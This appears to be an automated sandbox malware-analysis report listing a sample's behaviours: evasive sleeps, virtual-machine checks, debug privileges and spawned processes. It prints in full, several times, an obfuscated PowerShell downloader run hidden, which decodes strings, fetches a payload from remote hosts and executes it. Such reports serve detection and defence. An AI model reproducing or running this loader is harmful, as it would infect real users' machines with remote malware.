Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9274
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 676
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2665
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7214
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6840 Thread sleep count: 9274 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6840 Thread sleep count: 676 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6304 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704 Thread sleep count: 2665 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4888 Thread sleep count: 7214 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6440 Thread sleep time: -1844674407370954s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdiKj.rsNAmtsvKBruttL a ahe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden ";$pukka='drillevorn';;$additionstegnenes='drftede165';;$neri='thebain';;$asteroidens='outsling';;$daarskab='calamopitys';;$gastons=$host.name;function galskaber65($paretically){if ($gastons) {$chemiuserzation191=5} for ($thinkings=$chemiuserzation191;;$thinkings+=6){if(!$paretically[$thinkings]) { break }$kondenseringerne+=$paretically[$thinkings]}$kondenseringerne}function bearbejdeligste($fagidioternes){ .($medunderskriv) ($fagidioternes)}$succinctory46=galskaber65 'restinmediteingm.tm.tho. drifwelskoe hjembtelefcirreclbowleilasereancylnsaurut';$hjulpiskere=galskaber65 'inde,m gardo s adzekspristrumlstr.plsliksastrel/';$wiggas=galskaber65 'elbilt,ontrlrygdkstrlso1arn s2';$husholderisk='egne [invirnsu ple pr gtteg o.hjspnsbirdleskg,rrtilgivdiapai gawgcfor iegrshopfr boo iarii fo onlang tudsyrmlivsfachartnbajonapo.ygginoffedo.inrelekt]hydr :udnyt: tidsssk riev nfuccnemiu k ncruni.ei.uesttautopyskrifpsge rr sphao esudtomskiokonstcshrieounspelre da= arme$udpumwstrewi a.ndgteknogstal abu.kes';$hjulpiskere+=galskaber65 's bar5forpl.ligus0rhapo ganga( kultw unw ivinstngnetadrebutopectowm zzlsmarke h,emmnekspot ysse mana1cerva0h eml.overc0aftwa;pre t frivowtrussi pl mn acif6 ni h4digre; pela avocaxl ftn6 sa.o4mesot;blaat f gtnr d,sqv .ont:trolo1monoc3revei1 sp c. or m0hyper) jaev revergv ndierappocfunktkgrutno rest/ marc2dowha0bivaa1fod n0pili.0tivol1redif0 berb1hypos pa af e,oti ultrgenite forsfvaluto injux red/ util1krkli3 frey1sa.di.afgr 0';$vampirish=galskaber65 ' psycu blacstegneenatter op.a-misemaf lklgskrmbepharynrodent';$stokken=galskaber65 'elekth sandtnef,nt subvp digishaema:holda/ orbi/ kovsc ansvousk.dhunbuyatiff bhype imessatm onlabefaliresepsanden.silkerhaveeukolle.stttec untiosiphomtecto/h ghvc,orsts hvedsschin- ekos/degeromerckvserveebanker forls lfoop eseehovedifaeposbe.rakec.ocemaled.preo audskrskvabad si s>drifthorkant wh mtmalispnonalsimams:frem /met i/indvenusel rtegnk.fitchyrestiy stran ulkodcaprizg oseq pa e2 mulc. nonis stuba thed. iskcchuckotot mmmicro/pictuc colugbetweisolid_dili,bca diinoninnvrd.h/lnk rops,udvnarc enoni r ndrisbankfof.rreenonrhiu stys lea kvideoe unge. nisaa matrs uns d';$dogwinkle=galskaber65 'bivua>';$medunderskriv=galskaber65 'udskriplie,e,iskex';$overspille='secco';$blossoms='\suspendibility.lum';bearbejdeligste (galskaber65 'sojas$misgugal mnl detaomet lbflsenabrierl,ugnl: empod dskio hegugrustnmstopkapsychtstr kifil isprocemis ndeanathrjazzb= rdle$aroineupheanrevelv,tjer:creneaforhaptristp lossdfiletasupertforseaforbr+bidra$bjergbgoy,mlunreqoskomastredisde,mnoflowcmvellas');bearbejdeligste (galskaber65 'un.lo$unbrigclauslinforopapirbmas.iaun erlmodfa:tiaaro c rymrapshf,nkilap pulnhyletgglosasbrunibrhklueb,rgedflammmaccrum .inieankyll garrsforbie nandna,tob=latti$optigsstjmatkejseobushrk nathkres teaflasn spal.s utts untwpsig elde,eniglistticoni(grop,$lyn hd de.rouds jg.fsenwfa rdikj.rsnamtsvkbruttl a ahe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden ";$pukka='drillevorn';;$additionstegnenes='drftede165';;$neri='thebain';;$asteroidens='outsling';;$daarskab='calamopitys';;$gastons=$host.name;function galskaber65($paretically){if ($gastons) {$chemiuserzation191=5} for ($thinkings=$chemiuserzation191;;$thinkings+=6){if(!$paretically[$thinkings]) { break }$kondenseringerne+=$paretically[$thinkings]}$kondenseringerne}function bearbejdeligste($fagidioternes){ .($medunderskriv) ($fagidioternes)}$succinctory46=galskaber65 'restinmediteingm.tm.tho. drifwelskoe hjembtelefcirreclbowleilasereancylnsaurut';$hjulpiskere=galskaber65 'inde,m gardo s adzekspristrumlstr.plsliksastrel/';$wiggas=galskaber65 'elbilt,ontrlrygdkstrlso1arn s2';$husholderisk='egne [invirnsu ple pr gtteg o.hjspnsbirdleskg,rrtilgivdiapai gawgcfor iegrshopfr boo iarii fo onlang tudsyrmlivsfachartnbajonapo.ygginoffedo.inrelekt]hydr :udnyt: tidsssk riev nfuccnemiu k ncruni.ei.uesttautopyskrifpsge rr sphao esudtomskiokonstcshrieounspelre da= arme$udpumwstrewi a.ndgteknogstal abu.kes';$hjulpiskere+=galskaber65 's bar5forpl.ligus0rhapo ganga( kultw unw ivinstngnetadrebutopectowm zzlsmarke h,emmnekspot ysse mana1cerva0h eml.overc0aftwa;pre t frivowtrussi pl mn acif6 ni h4digre; pela avocaxl ftn6 sa.o4mesot;blaat f gtnr d,sqv .ont:trolo1monoc3revei1 sp c. or m0hyper) jaev revergv ndierappocfunktkgrutno rest/ marc2dowha0bivaa1fod n0pili.0tivol1redif0 berb1hypos pa af e,oti ultrgenite forsfvaluto injux red/ util1krkli3 frey1sa.di.afgr 0';$vampirish=galskaber65 ' psycu blacstegneenatter op.a-misemaf lklgskrmbepharynrodent';$stokken=galskaber65 'elekth sandtnef,nt subvp digishaema:holda/ orbi/ kovsc ansvousk.dhunbuyatiff bhype imessatm onlabefaliresepsanden.silkerhaveeukolle.stttec untiosiphomtecto/h ghvc,orsts hvedsschin- ekos/degeromerckvserveebanker forls lfoop eseehovedifaeposbe.rakec.ocemaled.preo audskrskvabad si s>drifthorkant wh mtmalispnonalsimams:frem /met i/indvenusel rtegnk.fitchyrestiy stran ulkodcaprizg oseq pa e2 mulc. nonis stuba thed. iskcchuckotot mmmicro/pictuc colugbetweisolid_dili,bca diinoninnvrd.h/lnk rops,udvnarc enoni r ndrisbankfof.rreenonrhiu stys lea kvideoe unge. nisaa matrs uns d';$dogwinkle=galskaber65 'bivua>';$medunderskriv=galskaber65 'udskriplie,e,iskex';$overspille='secco';$blossoms='\suspendibility.lum';bearbejdeligste (galskaber65 'sojas$misgugal mnl detaomet lbflsenabrierl,ugnl: empod dskio hegugrustnmstopkapsychtstr kifil isprocemis ndeanathrjazzb= rdle$aroineupheanrevelv,tjer:creneaforhaptristp lossdfiletasupertforseaforbr+bidra$bjergbgoy,mlunreqoskomastredisde,mnoflowcmvellas');bearbejdeligste (galskaber65 'un.lo$unbrigclauslinforopapirbmas.iaun erlmodfa:tiaaro c rymrapshf,nkilap pulnhyletgglosasbrunibrhklueb,rgedflammmaccrum .inieankyll garrsforbie nandna,tob=latti$optigsstjmatkejseobushrk nathkres teaflasn spal.s utts untwpsig elde,eniglistticoni(grop,$lyn hd de.rouds jg.fsenwfa rdikj.rsnamtsvkbruttl a ahe
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$pukka='drillevorn';;$additionstegnenes='drftede165';;$neri='thebain';;$asteroidens='outsling';;$daarskab='calamopitys';;$gastons=$host.name;function galskaber65($paretically){if ($gastons) {$chemiuserzation191=5} for ($thinkings=$chemiuserzation191;;$thinkings+=6){if(!$paretically[$thinkings]) { break }$kondenseringerne+=$paretically[$thinkings]}$kondenseringerne}function bearbejdeligste($fagidioternes){ .($medunderskriv) ($fagidioternes)}$succinctory46=galskaber65 'restinmediteingm.tm.tho. drifwelskoe hjembtelefcirreclbowleilasereancylnsaurut';$hjulpiskere=galskaber65 'inde,m gardo s adzekspristrumlstr.plsliksastrel/';$wiggas=galskaber65 'elbilt,ontrlrygdkstrlso1arn s2';$husholderisk='egne [invirnsu ple pr gtteg o.hjspnsbirdleskg,rrtilgivdiapai gawgcfor iegrshopfr boo iarii fo onlang tudsyrmlivsfachartnbajonapo.ygginoffedo.inrelekt]hydr :udnyt: tidsssk riev nfuccnemiu k ncruni.ei.uesttautopyskrifpsge rr sphao esudtomskiokonstcshrieounspelre da= arme$udpumwstrewi a.ndgteknogstal abu.kes';$hjulpiskere+=galskaber65 's bar5forpl.ligus0rhapo ganga( kultw unw ivinstngnetadrebutopectowm zzlsmarke h,emmnekspot ysse mana1cerva0h eml.overc0aftwa;pre t frivowtrussi pl mn acif6 ni h4digre; pela avocaxl ftn6 sa.o4mesot;blaat f gtnr d,sqv .ont:trolo1monoc3revei1 sp c. or m0hyper) jaev revergv ndierappocfunktkgrutno rest/ marc2dowha0bivaa1fod n0pili.0tivol1redif0 berb1hypos pa af e,oti ultrgenite forsfvaluto injux red/ util1krkli3 frey1sa.di.afgr 0';$vampirish=galskaber65 ' psycu blacstegneenatter op.a-misemaf lklgskrmbepharynrodent';$stokken=galskaber65 'elekth sandtnef,nt subvp digishaema:holda/ orbi/ kovsc ansvousk.dhunbuyatiff bhype imessatm onlabefaliresepsanden.silkerhaveeukolle.stttec untiosiphomtecto/h ghvc,orsts hvedsschin- ekos/degeromerckvserveebanker forls lfoop eseehovedifaeposbe.rakec.ocemaled.preo audskrskvabad si s>drifthorkant wh mtmalispnonalsimams:frem /met i/indvenusel rtegnk.fitchyrestiy stran ulkodcaprizg oseq pa e2 mulc. nonis stuba thed. iskcchuckotot mmmicro/pictuc colugbetweisolid_dili,bca diinoninnvrd.h/lnk rops,udvnarc enoni r ndrisbankfof.rreenonrhiu stys lea kvideoe unge. nisaa matrs uns d';$dogwinkle=galskaber65 'bivua>';$medunderskriv=galskaber65 'udskriplie,e,iskex';$overspille='secco';$blossoms='\suspendibility.lum';bearbejdeligste (galskaber65 'sojas$misgugal mnl detaomet lbflsenabrierl,ugnl: empod dskio hegugrustnmstopkapsychtstr kifil isprocemis ndeanathrjazzb= rdle$aroineupheanrevelv,tjer:creneaforhaptristp lossdfiletasupertforseaforbr+bidra$bjergbgoy,mlunreqoskomastredisde,mnoflowcmvellas');bearbejdeligste (galskaber65 'un.lo$unbrigclauslinforopapirbmas.iaun erlmodfa:tiaaro c rymrapshf,nkilap pulnhyletgglosasbrunibrhklueb,rgedflammmaccrum .inieankyll garrsforbie nandna,tob=latti$optigsstjmatkejseobushrk nathkres teaflasn spal.s utts untwpsig elde,eniglistticoni(grop,$lyn hd de.rouds jg.fsenwfa rdi
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
